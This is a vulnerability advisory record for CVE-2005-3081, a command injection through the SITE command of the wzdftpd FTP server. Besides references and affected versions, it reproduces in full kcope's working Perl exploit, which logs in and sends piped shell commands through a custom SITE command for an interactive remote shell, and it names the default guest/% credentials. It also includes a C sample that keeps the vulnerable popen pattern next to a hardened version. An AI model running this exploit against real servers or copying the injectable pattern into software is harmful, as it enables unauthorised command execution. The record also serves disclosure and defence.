Wzdftpd SITE Command Arbitrary Command Execution Vulnerability

Vulnerability ID: 1109090    Vulnerability type: Input validation
Published: 2005-09-24    Updated: 2006-12-15
CVE ID: CVE-2005-3081    CNNVD-ID: CNNVD-200509-251
Platform: Linux    CVSS score: 4.6
|Vulnerability sources
https://www.exploit-db.com/exploits/1231
https://www.securityfocus.com/bid/14935
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-251
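|Vulnerability details
wzdftpd is a modular, cross-platform, multithreaded FTP server. A security vulnerability exists in wzdftpd 0.5.4: remote authenticated users can execute arbitrary commands via shell metacharacters in the SITE command.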
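The flaw class described above, shown next to a hardened form, as an added example (not wzdftpd source and not part of the original record). The function names, the use of `/bin/echo` as a stand-in for a script bound to a custom SITE command, and the sample argument are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical handlers (not wzdftpd source): `script` is the program bound
 * to a custom SITE command, `arg` is client text. Both return bytes captured. */
/* Vulnerable pattern: the client text becomes part of a /bin/sh command. */
static long site_exec_popen(const char *script, const char *arg,
                            char *out, size_t cap) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "%s %s", script, arg);
    FILE *p = popen(cmd, "r");   /* sh -c interprets | ; ` $ ( ) in arg */
    if (!p) return -1;
    size_t n = fread(out, 1, cap - 1, p);
    out[n] = '\0';
    pclose(p);
    return (long)n;
}

/* Hardened pattern: no shell; the client text is a single argv element. */
static long site_exec_argv(const char *script, const char *arg,
                           char *out, size_t cap) {
    int fd[2];
    if (pipe(fd) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fd[0]); close(fd[1]); return -1; }
    if (pid == 0) {                     /* child: stdout -> pipe, then exec */
        dup2(fd[1], STDOUT_FILENO);
        close(fd[0]); close(fd[1]);
        execl(script, script, arg, (char *)NULL);
        _exit(127);                     /* exec failed */
    }
    close(fd[1]);
    size_t n = 0; ssize_t r;
    while (n < cap - 1 && (r = read(fd[0], out + n, cap - 1 - n)) > 0)
        n += (size_t)r;
    out[n] = '\0';
    close(fd[0]); waitpid(pid, NULL, 0);
    return (long)n;
}

int main(void) {
    char a[128] = "", b[128] = "";      /* "|echo INJECTED;" is constructed */
    site_exec_popen("/bin/echo", "|echo INJECTED;", a, sizeof a);
    site_exec_argv("/bin/echo", "|echo INJECTED;", b, sizeof b);
    return printf("popen: %sargv:  %s", a, b) < 0;
}
```

Passing the text as one argv element only removes the shell from the path; the script that receives it must still treat the argument as data.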
|Exploit
######################################################
# 0day0day0day0day0day0day0day
# -------------------------------
# wzdftpd remote exploit by kcope
# nice call to popen(3) on custom 
# site commands...
#
# August 2005
# confidential! keep private!
# -------------------------------
# 0day0day0day0day0day0day0day
#
#                    .___ _____  __             .___
#__  _  __________ __| _// ____\/  |_______   __| _/
#\ \/ \/ /\___   // __ |\   __\\   __\____ \ / __ | 
# \     /  /    // /_/ | |  |   |  | |  |_> > /_/ | 
#  \/\_/  /_____ \____ | |__|   |__| |   __/\____ | 
#               \/    \/             |__|        \/ 
#                                      
#__  _  _______ _______   ____ ________
#\ \/ \/ /\__  \\_  __ \_/ __ \\___   /
# \     /  / __ \|  | \/\  ___/ /    / 
#  \/\_/  (____  /__|    \___  >_____ \
#              \/            \/      \/ VER1
######################################################

use Net::FTP;

sub usage {
	print "usage: wzdftpdwarez.pl remote_host remote_port user pass custom_site_command\n"
	     ."default guest account for wzdftpd is username/password: guest/%\n";
}

print "
wzdftpd remote exploit by kcope
August 2005
confidential! keep private!

";

if ($#ARGV < 4) {
	usage();
	exit();	 
}

$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$sitecmd = $ARGV[4];

$ftp = Net::FTP->new(Host => $host, Port => $port, Debug => 0)
     or die "Cannot connect to $host: $@";

$ftp->login($user, $pass)
     or die "Cannot login ", $ftp->message;
     
print "Now you can type commands, hopefully as r00t!\n";
while(1) {
	print "!\$%&#>";
	$cmd=<stdin>;
	$ftp->site($sitecmd, "|$cmd;");
	print $ftp->message();
}

# milw0rm.com [2005-09-24]
|Affected products
wzdftpd wzdftpd 0.5.4
wzdftpd wzdftpd 0.5.2
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1
|References

Source: BID
Name: 14935
Link: http://www.securityfocus.com/bid/14935
Source: MISC
Link: http://www.securiteam.com/exploits/5CP0R1PGUE.html
Source: OSVDB
Name: 19682
Link: http://www.osvdb.org/19682
Source: SECUNIA
Name: 16936
Link: http://secunia.com/advisories/16936
Source: FULLDISC
Name: 20050924 It's time for some warez - wzdftpd remote exploit
Link: http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0646.html
Source: DEBIAN
Name: DSA-1006
Link: http://www.debian.org/security/2006/dsa-1006